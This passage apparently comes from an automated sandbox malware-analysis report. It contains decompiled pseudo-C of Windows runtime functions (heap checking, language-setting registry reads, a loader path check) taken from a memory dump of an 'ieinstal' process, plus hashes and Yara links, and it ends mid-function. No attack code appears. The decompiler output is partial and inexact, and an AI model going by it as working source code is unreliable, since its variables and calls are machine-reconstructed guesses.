                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                • API String ID: 0-3178619729
                                                                                                                • Opcode ID: ef9615a2c902b5b4fc3d5e48ecf0771bd478fdc9552c83ad884432617d220068
                                                                                                                • Instruction ID: 89b9a7f4671250ade5c8b03f43a789ad217eb67838b5b60f386b799c904b9666
                                                                                                                • Opcode Fuzzy Hash: ef9615a2c902b5b4fc3d5e48ecf0771bd478fdc9552c83ad884432617d220068
                                                                                                                • Instruction Fuzzy Hash: D622F170A10282DFE715CF24C494BAABBF7FF4A704FA48699E455CB281E731E981CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1E688FBC Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 74%
                                                                                                                			E1E688FBC(intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _v16;
				intOrPtr _v84;
				char _v92;
				signed char _v96;
				signed char _v100;
				signed char _v104;
				char _v108;
				char _v112;
				signed int _v116;
				signed char _v120;
				intOrPtr _v124;
				char _v125;
				intOrPtr _v128;
				void* _v132;
				void* _v133;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t90;
				signed int _t91;
				signed char _t94;
				intOrPtr _t103;
				signed int _t104;
				signed char _t109;
				void* _t120;
				char* _t127;
				signed char _t128;
				intOrPtr _t129;
				signed char _t131;
				signed char _t144;
				void* _t148;
				intOrPtr _t149;
				void* _t150;
				signed char _t152;
				intOrPtr* _t155;
				void* _t156;
				signed int _t157;
				signed int _t159;

				_t159 = (_t157 & 0xfffffff8) - 0x7c;
				_t87 =  *0x1e74b370 ^ _t159;
				_v8 =  *0x1e74b370 ^ _t159;
				_t139 = _a8;
				_t155 = _a4;
				_t119 = 0;
				_push(_t148);
				_v124 = _a8;
				_v125 = 0;
				if( *_t155 == 0xc0000006 || E1E68931B(_t87,  *((intOrPtr*)(_t155 + 0xc))) == 0) {
					if(( *( *[fs:0x30] + 0x68) & 0x00800000) != 0) {
						_v125 = 1;
						E1E708BBD(_t155, _t139);
					}
					_t90 = E1E670130();
					_t149 = _v124;
					if(_t90 != 0) {
						_t91 = E1E689325(_t119,  *((intOrPtr*)(_t149 + 0xc4)), _t149, _t155, __eflags);
						__eflags = _t91;
						if(_t91 != 0) {
							goto L4;
						} else {
							_t131 = 0xd;
							asm("int 0x29");
							goto L25;
						}
					} else {
						L4:
						if(E1E68CCD1(_t155, _t149, _t119) != 0) {
							L20:
							_t119 = 1;
							L21:
							_t139 = _v124;
							E1E68CCD1(_t155, _v124, 1);
							_t94 = _t119;
							goto L22;
						}
						_t127 =  &_v112;
						E1E6892EF(_t127,  &_v108);
						_t151 =  *[fs:0x0];
						_push(_t119);
						_push(4);
						_push( &_v116);
						_push(0x22);
						_push(0xffffffff);
						_v120 =  *[fs:0x0];
						_v116 = _t119;
						if(E1E692B20() < 0) {
							_v116 = _t119;
						}
						if((_v116 & 0x00000040) != 0) {
							L8:
							_t128 = _v120;
							_v104 = _t119;
							L9:
							if(_t128 == 0xffffffff) {
								goto L21;
							}
							if(_t128 < _v112 || _t128 + 8 > _v108 || (_t128 & 0x00000003) != 0) {
								L29:
								 *(_t155 + 4) =  *(_t155 + 4) | 0x00000008;
								goto L21;
							} else {
								_t129 =  *((intOrPtr*)(_t128 + 4));
								if(_t129 < _v108) {
									__eflags = _v112 - _t129;
									if(_v112 > _t129) {
										goto L14;
									}
									goto L29;
								}
								L14:
								if(E1E689193(_t129, _v116, _v124) == 0) {
									goto L29;
								}
								_t152 = _v120;
								_v100 = _t119;
								if(_v125 != _t119) {
									_v108 = E1E708C65(_t155, _v124, _t129,  *((intOrPtr*)(_t152 + 4)));
								}
								_t103 = E1E6A8860(_t155, _t152, _v124,  &_v96,  *((intOrPtr*)(_t152 + 4)));
								_t131 = _v120;
								if(_t131 != 0) {
									 *((intOrPtr*)(_t131 + 0x320)) = _t103;
								}
								_t144 = _v104;
								if(_t144 == _t152) {
									 *(_t155 + 4) =  *(_t155 + 4) & 0xffffffef;
									_t144 = _t119;
									_v104 = _t144;
								}
								_t91 = _t103 - _t119;
								if(_t91 != 0) {
									L25:
									_t104 = _t91 - 1;
									__eflags = _t104;
									if(_t104 != 0) {
										__eflags = _t104 == 1;
										if(_t104 == 1) {
											 *(_t155 + 4) =  *(_t155 + 4) | 0x00000010;
											__eflags = _v96 - _t144;
											if(_v96 > _t144) {
												_v104 = _v96;
											}
										} else {
											_v92 = 0xc0000026;
											_push( &_v92);
											 *((intOrPtr*)(_t159 + 0x38)) = 1;
											_v84 = _t155;
											 *(_t159 + 0x44) = _t119;
											L1E6A8A60(_t131, _t144);
										}
										goto L27;
									}
									goto L26;
								} else {
									_t109 = _t91 + 1;
									if(( *(_t155 + 4) & _t109) != 0) {
										 *(_t159 + 0x34) = _t109;
										_push( &_v92);
										_v92 = 0xc0000025;
										_v84 = _t155;
										 *(_t159 + 0x44) = _t119;
										L1E6A8A60(_t131, _t144);
										L26:
										__eflags =  *(_t155 + 4) & 0x00000008;
										if(( *(_t155 + 4) & 0x00000008) != 0) {
											goto L21;
										}
										L27:
										_t128 =  *_v120;
										_v120 = _t128;
										goto L9;
									}
									goto L20;
								}
							}
						} else {
							_push(_t127);
							if(E1E689284(_t151, _v112, _v108) == 0) {
								 *(_t155 + 4) =  *(_t155 + 4) | 0x00000008;
								__eflags =  *0x1e7438bc - 2;
								if( *0x1e7438bc != 2) {
									goto L21;
								}
								asm("lock cmpxchg [edx], ecx");
								__eflags = 0;
								if(0 == 0) {
									E1E7067F9(_t119, _t155, _v128, 0);
								}
								 *(_t155 + 4) =  *(_t155 + 4) & 0xfffffff7;
							}
							goto L8;
						}
					}
				} else {
					E1E703A55(0,  *((intOrPtr*)(_t139 + 0xac)), _t139, _t148);
					 *((intOrPtr*)(_v124 + 0xb8)) = E1E7067F3();
					_t94 = 1;
					L22:
					_pop(_t150);
					_pop(_t156);
					_pop(_t120);
					return E1E694B50(_t94, _t120, _v8 ^ _t159, _t139, _t150, _t156);
				}
			}











































                                                                                                                0x1e688fc4
                                                                                                                0x1e688fcc
                                                                                                                0x1e688fce
                                                                                                                0x1e688fd2
                                                                                                                0x1e688fd7
                                                                                                                0x1e688fda
                                                                                                                0x1e688fdc
                                                                                                                0x1e688fdd
                                                                                                                0x1e688fe1
                                                                                                                0x1e688feb
                                                                                                                0x1e68900a
                                                                                                                0x1e6c5a79
                                                                                                                0x1e6c5a7e
                                                                                                                0x1e6c5a7e
                                                                                                                0x1e689010
                                                                                                                0x1e689015
                                                                                                                0x1e68901b
                                                                                                                0x1e689153
                                                                                                                0x1e689158
                                                                                                                0x1e68915a
                                                                                                                0x00000000
                                                                                                                0x1e689160
                                                                                                                0x1e689162
                                                                                                                0x1e689163
                                                                                                                0x00000000
                                                                                                                0x1e689163
                                                                                                                0x1e689021
                                                                                                                0x1e689021
                                                                                                                0x1e68902d
                                                                                                                0x1e689125
                                                                                                                0x1e689125
                                                                                                                0x1e689127
                                                                                                                0x1e689127
                                                                                                                0x1e68912f
                                                                                                                0x1e689134
                                                                                                                0x00000000
                                                                                                                0x1e689134
                                                                                                                0x1e689037
                                                                                                                0x1e68903b
                                                                                                                0x1e689040
                                                                                                                0x1e68904b
                                                                                                                0x1e68904c
                                                                                                                0x1e68904e
                                                                                                                0x1e68904f
                                                                                                                0x1e689051
                                                                                                                0x1e689053
                                                                                                                0x1e689057
                                                                                                                0x1e689062
                                                                                                                0x1e6c5a88
                                                                                                                0x1e6c5a88
                                                                                                                0x1e68906d
                                                                                                                0x1e689087
                                                                                                                0x1e689087
                                                                                                                0x1e68908b
                                                                                                                0x1e68908f
                                                                                                                0x1e689092
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e68909c
                                                                                                                0x1e68918d
                                                                                                                0x1e68918d
                                                                                                                0x00000000
                                                                                                                0x1e6890b8
                                                                                                                0x1e6890b8
                                                                                                                0x1e6890bf
                                                                                                                0x1e689183
                                                                                                                0x1e689187
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e689187
                                                                                                                0x1e6890c5
                                                                                                                0x1e6890d4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6890da
                                                                                                                0x1e6890de
                                                                                                                0x1e6890e6
                                                                                                                0x1e6c5ad7
                                                                                                                0x1e6c5ad7
                                                                                                                0x1e6890fa
                                                                                                                0x1e6890ff
                                                                                                                0x1e689105
                                                                                                                0x1e6c5ae0
                                                                                                                0x1e6c5ae0
                                                                                                                0x1e68910b
                                                                                                                0x1e689111
                                                                                                                0x1e6c5aeb
                                                                                                                0x1e6c5aef
                                                                                                                0x1e6c5af1
                                                                                                                0x1e6c5af1
                                                                                                                0x1e689117
                                                                                                                0x1e689119
                                                                                                                0x1e689165
                                                                                                                0x1e689165
                                                                                                                0x1e689165
                                                                                                                0x1e689168
                                                                                                                0x1e6c5afa
                                                                                                                0x1e6c5afd
                                                                                                                0x1e6c5b26
                                                                                                                0x1e6c5b2a
                                                                                                                0x1e6c5b2e
                                                                                                                0x1e6c5b38
                                                                                                                0x1e6c5b38
                                                                                                                0x1e6c5aff
                                                                                                                0x1e6c5b03
                                                                                                                0x1e6c5b0b
                                                                                                                0x1e6c5b0c
                                                                                                                0x1e6c5b14
                                                                                                                0x1e6c5b18
                                                                                                                0x1e6c5b1c
                                                                                                                0x1e6c5b1c
                                                                                                                0x00000000
                                                                                                                0x1e6c5afd
                                                                                                                0x00000000
                                                                                                                0x1e68911b
                                                                                                                0x1e68911b
                                                                                                                0x1e68911f
                                                                                                                0x1e6c5b41
                                                                                                                0x1e6c5b49
                                                                                                                0x1e6c5b4a
                                                                                                                0x1e6c5b52
                                                                                                                0x1e6c5b56
                                                                                                                0x1e6c5b5a
                                                                                                                0x1e68916e
                                                                                                                0x1e68916e
                                                                                                                0x1e689172
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e689174
                                                                                                                0x1e689178
                                                                                                                0x1e68917a
                                                                                                                0x00000000
                                                                                                                0x1e68917a
                                                                                                                0x00000000
                                                                                                                0x1e68911f
                                                                                                                0x1e689119
                                                                                                                0x1e68906f
                                                                                                                0x1e689073
                                                                                                                0x1e689081
                                                                                                                0x1e6c5a91
                                                                                                                0x1e6c5a95
                                                                                                                0x1e6c5a9c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6c5aac
                                                                                                                0x1e6c5ab0
                                                                                                                0x1e6c5ab2
                                                                                                                0x1e6c5aba
                                                                                                                0x1e6c5aba
                                                                                                                0x1e6c5abf
                                                                                                                0x1e6c5abf
                                                                                                                0x00000000
                                                                                                                0x1e689081
                                                                                                                0x1e68906d
                                                                                                                0x1e6c5a56
                                                                                                                0x1e6c5a5c
                                                                                                                0x1e6c5a6a
                                                                                                                0x1e6c5a70
                                                                                                                0x1e689136
                                                                                                                0x1e68913d
                                                                                                                0x1e68913e
                                                                                                                0x1e68913f
                                                                                                                0x1e68914a
                                                                                                                0x1e68914a

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E620000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.25368869920.000000001E749000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_1e620000_ieinstal.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: %$&$@
                                                                                                                • API String ID: 0-1537733988
                                                                                                                • Opcode ID: 76d1fddc2497f388e68f24c2ce53171d08f01e28559f5c78397bfcc79a12f4e5
                                                                                                                • Instruction ID: ee7584fc797187fa370af4ccfc69b1352183fc2930fd710dc3ffa2cdce958fe0
                                                                                                                • Opcode Fuzzy Hash: 76d1fddc2497f388e68f24c2ce53171d08f01e28559f5c78397bfcc79a12f4e5
                                                                                                                • Instruction Fuzzy Hash: A771CD746083829FC304CF61C998A1BBBE6BFCA718F948B1DE5DA57254C730E805CB92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1E64CC68 Relevance: 3.9, Strings: 3, Instructions: 164COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E1E64CC68(void* __ecx, short* __edx, short* _a4) {
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t58;
				signed int _t73;
				signed short* _t74;
				signed int _t75;
				signed short* _t77;
				signed int _t82;
				short* _t92;
				signed short* _t93;
				short* _t95;
				void* _t96;
				signed int _t98;
				void* _t100;
				void* _t101;

				_t79 = __ecx;
				_t100 = (_t98 & 0xfffffff8) - 0x34;
				_t95 = __edx;
				_v44 = __edx;
				_t77 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t96 = 0xc000000d;
				} else {
					_t92 = _a4;
					if(_t92 == 0) {
						goto L28;
					}
					_t77 = E1E64D818(__ecx, 0xac);
					if(_t77 == 0) {
						_t96 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E1E692A80();
						}
						if(_t77 != 0) {
							E1E663BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t77);
						}
						return _t96;
					}
					E1E698F40(_t77, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t101 = _t100 + 0xc;
					 *_t95 = 0;
					 *_t92 = 0;
					E1E695050(_t79,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v32 = 0;
					_push( &_v36);
					_push(0x20019);
					_v24 = 0x40;
					_push( &_v64);
					_v20 = 0;
					_v16 = 0;
					_t96 = E1E692AB0();
					if(_t96 < 0) {
						goto L6;
					}
					E1E695050(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t96 = E1E64D64A(_v64,  &_v44,  &_v56, _t77,  &_v48);
					if(_t96 >= 0) {
						if(_v52 != 1) {
							L17:
							_t96 = 0xc0000001;
							goto L6;
						}
						_t58 =  *_t77 & 0x0000ffff;
						_t93 = _t77;
						_t82 = _t58;
						if(_t58 == 0) {
							L19:
							if(_t82 == 0) {
								L23:
								E1E695050(_t82, _t101 + 0x24, _t77);
								if(E1E6756E0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t83 = _v48;
								 *_v48 = _v56;
								if( *_t93 != 0) {
									E1E695050(_t83, _t101 + 0x24, _t93);
									if(E1E6756E0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t96 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t82 = _t82 & 0x0000ffff;
							while(_t82 == 0x20) {
								_t93 =  &(_t93[1]);
								_t73 =  *_t93 & 0x0000ffff;
								_t82 = _t73;
								if(_t73 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t26 =  &(_t93[1]); // 0x2
							_t74 = _t26;
							if(_t82 == 0x2c) {
								break;
							}
							_t93 = _t74;
							_t75 =  *_t93 & 0x0000ffff;
							_t82 = _t75;
							if(_t75 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t93 = 0;
						_t93 = _t74;
						_t82 =  *_t74 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                                                                                0x1e64cc68
                                                                                                                0x1e64cc70
                                                                                                                0x1e64cc77
                                                                                                                0x1e64cc79
                                                                                                                0x1e64cc7d
                                                                                                                0x1e64cc7f
                                                                                                                0x1e64cc86
                                                                                                                0x1e6aa26b
                                                                                                                0x1e6aa26b
                                                                                                                0x1e64cc94
                                                                                                                0x1e64cc94
                                                                                                                0x1e64cc99
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e64cca9
                                                                                                                0x1e64ccad
                                                                                                                0x1e6aa192
                                                                                                                0x1e64cd59
                                                                                                                0x1e64cd5e
                                                                                                                0x1e64cd60
                                                                                                                0x1e64cd64
                                                                                                                0x1e64cd64
                                                                                                                0x1e64cd6b
                                                                                                                0x1e64cd7a
                                                                                                                0x1e64cd7a
                                                                                                                0x1e64cd87
                                                                                                                0x1e64cd87
                                                                                                                0x1e64ccbb
                                                                                                                0x1e64ccc0
                                                                                                                0x1e64ccc5
                                                                                                                0x1e64ccca
                                                                                                                0x1e64cccd
                                                                                                                0x1e64ccda
                                                                                                                0x1e64cce3
                                                                                                                0x1e64cceb
                                                                                                                0x1e64ccf5
                                                                                                                0x1e64ccf9
                                                                                                                0x1e64ccfa
                                                                                                                0x1e64cd03
                                                                                                                0x1e64cd0b
                                                                                                                0x1e64cd0c
                                                                                                                0x1e64cd10
                                                                                                                0x1e64cd19
                                                                                                                0x1e64cd1d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e64cd29
                                                                                                                0x1e64cd2e
                                                                                                                0x1e64cd3d
                                                                                                                0x1e64cd4f
                                                                                                                0x1e64cd53
                                                                                                                0x1e6aa1a1
                                                                                                                0x1e6aa1c6
                                                                                                                0x1e6aa1c6
                                                                                                                0x00000000
                                                                                                                0x1e6aa1c6
                                                                                                                0x1e6aa1a3
                                                                                                                0x1e6aa1a6
                                                                                                                0x1e6aa1a8
                                                                                                                0x1e6aa1ad
                                                                                                                0x1e6aa1da
                                                                                                                0x1e6aa1dd
                                                                                                                0x1e6aa1f5
                                                                                                                0x1e6aa1fb
                                                                                                                0x1e6aa211
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6aa213
                                                                                                                0x1e6aa21c
                                                                                                                0x1e6aa224
                                                                                                                0x1e6aa230
                                                                                                                0x1e6aa246
                                                                                                                0x1e6aa263
                                                                                                                0x1e6aa248
                                                                                                                0x1e6aa24e
                                                                                                                0x1e6aa253
                                                                                                                0x1e6aa253
                                                                                                                0x1e6aa246
                                                                                                                0x00000000
                                                                                                                0x1e6aa224
                                                                                                                0x1e6aa1df
                                                                                                                0x1e6aa1e2
                                                                                                                0x1e6aa1e8
                                                                                                                0x1e6aa1eb
                                                                                                                0x1e6aa1ee
                                                                                                                0x1e6aa1f3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6aa1f3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6aa1af
                                                                                                                0x1e6aa1af
                                                                                                                0x1e6aa1af
                                                                                                                0x1e6aa1af
                                                                                                                0x1e6aa1b6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6aa1b8
                                                                                                                0x1e6aa1ba
                                                                                                                0x1e6aa1bd
                                                                                                                0x1e6aa1c2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6aa1c4
                                                                                                                0x1e6aa1d2
                                                                                                                0x1e6aa1d5
                                                                                                                0x1e6aa1d7
                                                                                                                0x00000000
                                                                                                                0x1e6aa1d7
                                                                                                                0x1e64cd53

                                                                                                                Strings
                                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 1E64CCD4
                                                                                                                • InstallLanguageFallback, xrefs: 1E64CD1F
                                                                                                                • @, xrefs: 1E64CD03
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E620000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.25368869920.000000001E749000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_1e620000_ieinstal.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                                                • API String ID: 0-1757540487
                                                                                                                • Opcode ID: 67e79ec461e36c5cccd04598edb5a7bccb2ba9156b103c9ffa1b7f8d9e69216f
                                                                                                                • Instruction ID: c834d291cb54054e0401b0cdcc4337007063be75f6edf4833554a3398fa058b7
                                                                                                                • Opcode Fuzzy Hash: 67e79ec461e36c5cccd04598edb5a7bccb2ba9156b103c9ffa1b7f8d9e69216f
                                                                                                                • Instruction Fuzzy Hash: 8151BF76905342ABC300DF64C850B6EB3E9AF89714F910E2EFA85E7250E734DD05C7A6
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1E70BD08 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 85%
                                                                                                                			E1E70BD08(intOrPtr __ecx, void* __edx, char* _a4, intOrPtr _a8) {
				signed int _v8;
				char _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char* _v44;
				intOrPtr _v48;
				char _v52;
				intOrPtr _t64;
				void* _t68;
				char* _t75;

				_v8 = _v8 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_t64 = 0;
				_v20 = __ecx;
				_v12 = 7;
				if(__ecx == 0) {
					L14:
					_t76 = 0xc000000d;
				} else {
					_t75 = _a4;
					if(_t75 == 0 || _a8 == 0) {
						goto L14;
					} else {
						E1E695050(__ecx,  &_v28, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\MUI\\Settings");
						_v52 = 0x18;
						_v44 =  &_v28;
						_v48 = 0;
						_push( &_v52);
						_push(0x20019);
						_v40 = 0x40;
						_push( &_v8);
						_v36 = 0;
						_v32 = 0;
						if(E1E692AB0() >= 0) {
							E1E695050(0,  &_v28, L"PreferredUILanguages");
							_push(0);
							_t68 = E1E64D64A(_v8,  &_v28,  &_v12, 0,  &_v16);
							_t76 = 0xc0000034;
							if(_t68 == 0xc0000034) {
								goto L4;
							} else {
								_t54 = _v16;
								if(_v16 == 0) {
									goto L4;
								} else {
									if(_t68 == 0x80000005) {
										_t64 = E1E665D90(_t68,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t54 + 2);
										if(_t64 != 0) {
											_push(_t68);
											_t76 = E1E64D64A(_v8,  &_v28,  &_v12, _t64,  &_v16);
											if(_t76 >= 0) {
												if(_v12 == 7 || _v12 == 1) {
													 *_t75 = 0;
													_t76 = L1E674CA6(_v20, _t64, _v16 >> 1, 8, 3, 1, _a8);
												} else {
													goto L4;
												}
											}
										} else {
											_t76 = 0xffffffffc0000017;
										}
									}
								}
							}
						} else {
							L4:
							_t76 = 0;
							 *_t75 = 1;
						}
					}
				}
				if(_v8 != 0) {
					_push(_v8);
					E1E692A80();
				}
				if(_t64 != 0) {
					E1E663BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t64);
				}
				return _t76;
			}

















                                                                                                                0x1e70bd10
                                                                                                                0x1e70bd16
                                                                                                                0x1e70bd1c
                                                                                                                0x1e70bd1e
                                                                                                                0x1e70bd21
                                                                                                                0x1e70bd2b
                                                                                                                0x1e70be3a
                                                                                                                0x1e70be3a
                                                                                                                0x1e70bd31
                                                                                                                0x1e70bd31
                                                                                                                0x1e70bd36
                                                                                                                0x00000000
                                                                                                                0x1e70bd45
                                                                                                                0x1e70bd4e
                                                                                                                0x1e70bd56
                                                                                                                0x1e70bd5d
                                                                                                                0x1e70bd65
                                                                                                                0x1e70bd68
                                                                                                                0x1e70bd69
                                                                                                                0x1e70bd71
                                                                                                                0x1e70bd78
                                                                                                                0x1e70bd79
                                                                                                                0x1e70bd7c
                                                                                                                0x1e70bd86
                                                                                                                0x1e70bd9b
                                                                                                                0x1e70bda0
                                                                                                                0x1e70bdb6
                                                                                                                0x1e70bdb8
                                                                                                                0x1e70bdbf
                                                                                                                0x00000000
                                                                                                                0x1e70bdc1
                                                                                                                0x1e70bdc1
                                                                                                                0x1e70bdc6
                                                                                                                0x00000000
                                                                                                                0x1e70bdc8
                                                                                                                0x1e70bdce
                                                                                                                0x1e70bde4
                                                                                                                0x1e70bde8
                                                                                                                0x1e70bdef
                                                                                                                0x1e70be04
                                                                                                                0x1e70be08
                                                                                                                0x1e70be0e
                                                                                                                0x1e70be2e
                                                                                                                0x1e70be36
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e70be0e
                                                                                                                0x1e70bdea
                                                                                                                0x1e70bdea
                                                                                                                0x1e70bdea
                                                                                                                0x1e70bde8
                                                                                                                0x1e70bdce
                                                                                                                0x1e70bdc6
                                                                                                                0x1e70bd88
                                                                                                                0x1e70bd88
                                                                                                                0x1e70bd88
                                                                                                                0x1e70bd8a
                                                                                                                0x1e70bd8a
                                                                                                                0x1e70bd86
                                                                                                                0x1e70bd36
                                                                                                                0x1e70be43
                                                                                                                0x1e70be45
                                                                                                                0x1e70be48
                                                                                                                0x1e70be48
                                                                                                                0x1e70be4f
                                                                                                                0x1e70be5d
                                                                                                                0x1e70be5d
                                                                                                                0x1e70be68

                                                                                                                Strings
                                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 1E70BD45
                                                                                                                • PreferredUILanguages, xrefs: 1E70BD92
                                                                                                                • @, xrefs: 1E70BD71
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E620000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.25368869920.000000001E749000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_1e620000_ieinstal.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                • API String ID: 0-2968386058
                                                                                                                • Opcode ID: 9bd6f8def23db61bc70c72e90b91d7a10a3e6c81ae77deb4a3b0f90a82c6a21b
                                                                                                                • Instruction ID: 6f2357207dcd9adaf780f3d366f4117c1c637dca560278f86ba3040af9fbfd7e
                                                                                                                • Opcode Fuzzy Hash: 9bd6f8def23db61bc70c72e90b91d7a10a3e6c81ae77deb4a3b0f90a82c6a21b
                                                                                                                • Instruction Fuzzy Hash: DD419E72E0124AABEB01CF94C890FEEB7F9AF05B04F504669E606E7290D7749B44CB94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1E6E3CD4 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 89%
                                                                                                                			E1E6E3CD4(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				short _t35;
				short _t36;
				intOrPtr _t38;
				void* _t54;
				signed char* _t55;
				signed char* _t61;
				signed char _t65;
				signed int _t76;
				void* _t81;
				signed char* _t83;
				void* _t86;

				_push(0x6c);
				_push(0x1e72cf60);
				E1E6A7C40(__ebx, __edi, __esi);
				_t81 = __ecx;
				_t65 = 0x3a;
				 *(_t86 - 0x50) = _t65;
				_t35 = 0x3c;
				 *((short*)(_t86 - 0x4e)) = _t35;
				 *(_t86 - 0x4c) = L"LdrpResValidateFilePath Enter";
				_t36 = 0x38;
				 *((short*)(_t86 - 0x58)) = _t36;
				 *(_t86 - 0x56) = _t65;
				 *(_t86 - 0x54) = L"LdrpResValidateFilePath Exit";
				if(E1E663C40() == 0) {
					_t66 = 0x7ffe0385;
				} else {
					_t66 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
				}
				if(( *_t66 & 0x00000001) == 0) {
					_t61 = 0x7ffe0384;
				} else {
					_t54 = E1E663C40();
					_t61 = 0x7ffe0384;
					if(_t54 == 0) {
						_t55 = 0x7ffe0384;
					} else {
						_t55 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_t66 = _t86 - 0x50;
					E1E6DFC01(_t86 - 0x50,  *_t55 & 0x000000ff);
				}
				if(_t81 != 0) {
					 *((intOrPtr*)(_t86 - 4)) = 0;
					_t38 = E1E6534C0(_t81);
					 *((intOrPtr*)(_t86 - 0x7c)) = _t38;
					 *((intOrPtr*)(_t86 - 4)) = 0xfffffffe;
					if(_t38 == 1 || _t38 == 2 || _t38 == 6) {
						if(E1E671BA0(_t66, _t81, _t86 - 0x60, 0, 0) != 0) {
							 *((intOrPtr*)(_t86 - 0x78)) = 0x18;
							 *((intOrPtr*)(_t86 - 0x74)) = 0;
							 *((intOrPtr*)(_t86 - 0x6c)) = 0x40;
							 *((intOrPtr*)(_t86 - 0x70)) = _t86 - 0x60;
							 *((intOrPtr*)(_t86 - 0x68)) = 0;
							 *((intOrPtr*)(_t86 - 0x64)) = 0;
							_push(_t86 - 0x44);
							_push(_t86 - 0x78);
							_t76 = E1E692D80();
